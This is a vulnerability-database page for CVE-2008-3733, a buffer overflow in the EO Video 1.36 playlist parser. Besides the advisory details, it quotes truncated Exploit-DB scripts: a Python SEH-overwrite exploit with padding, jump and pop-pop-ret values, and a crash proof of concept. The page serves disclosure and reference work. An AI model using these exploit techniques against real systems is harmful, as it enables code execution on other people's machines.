CVE-2008-3733
published 2008-08-20CVE-2008-3733: Stack-based buffer overflow in EO Video (eo-video) 1.36 allows remote attackers to cause a denial of service (application crash) or execute arbitrary code via…
PriorityP343critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
6.03%
92.4th percentile
Stack-based buffer overflow in EO Video (eo-video) 1.36 allows remote attackers to cause a denial of service (application crash) or execute arbitrary code via a .eop (aka playlist) file with a ProjectElement element that contains a long Name element.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| eo-video | eo-video | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
EO Video 1.36 - Playlist Overwrite (SEH)
exploitdb·2009-03-09
CVE-2008-3733 EO Video 1.36 - Playlist Overwrite (SEH)
EO Video 1.36 - Playlist Overwrite (SEH)
---
#!/usr/bin/python
#usage: exploit.py
print "**************************************************************************"
print "[*] EO Video v1.36 PlayList Seh Overwrite Exploit\n"
print "[*] Author: j0rgan"
print "[*] Seh Exploitation : His0k4"
print "[*] Tested on: Windows XP SP2 (Fr)\n"
print "[*] Greetings to: All friends & Muslims HacKerS (DZ)"
print "**************************************************************************"
buff = "\x41" * 1356
next_seh = "\xEB\x06\x41\x41"
seh = "\x14\x1E\x5B\x58" #pop pop ret msgsm32 .acm
header1= (
"\x3C\x45\x4F\x50\x6C\x61\x79\x6C\x69\x73\x74\x3E\x0A\x3C\x50\x6C\x61\x79\x6C"
"\x69\x73\x74\x3E\x0A\x3C\x46\x6F\x6C\x64\x65\x72\x4C\x69\x73\x74\x3E\x0A\x3C"
"\x46\x6F\x6C\x64\x65\x72\x3E\x0A\x3C\x4E\x6
Exploit-DB
EO Video 1.36 - Local Heap Overflow Denial of Service / (PoC)
exploitdb·2008-08-16
CVE-2008-3733 EO Video 1.36 - Local Heap Overflow Denial of Service / (PoC)
EO Video 1.36 - Local Heap Overflow Denial of Service / (PoC)
---
#!/usr/bin/python
# --------------------------------------------------------------
# EO Video v1.36 Heap Overflow local PoC/DoS exploit
# *.eop playlist file in buffer overflow
# Other versions may be vulnerable too...
# --------------------------------------------------------------
# Vulnerability discovered and coded by Muris Kurgas aka j0rgan
# jorganwd [at] gmail [dot] com
# --------------------------------------------------------------
#
# Who uses this crap of player anyway? :)
# --------------------------------------------------------------
# EAX 42424242
# EDX 42424242
# --------------------------------------------------------------
import os
bafer = '\x41'* 700 + '\x42' * 4
print "Spit me out, all bright and sh
No writeups or analysis indexed.
http://secunia.com/advisories/31511http://securityreason.com/securityalert/4171http://www.securityfocus.com/bid/30717https://exchange.xforce.ibmcloud.com/vulnerabilities/44508https://www.exploit-db.com/exploits/6253http://secunia.com/advisories/31511http://securityreason.com/securityalert/4171http://www.securityfocus.com/bid/30717https://exchange.xforce.ibmcloud.com/vulnerabilities/44508https://www.exploit-db.com/exploits/6253
2008-08-20
Published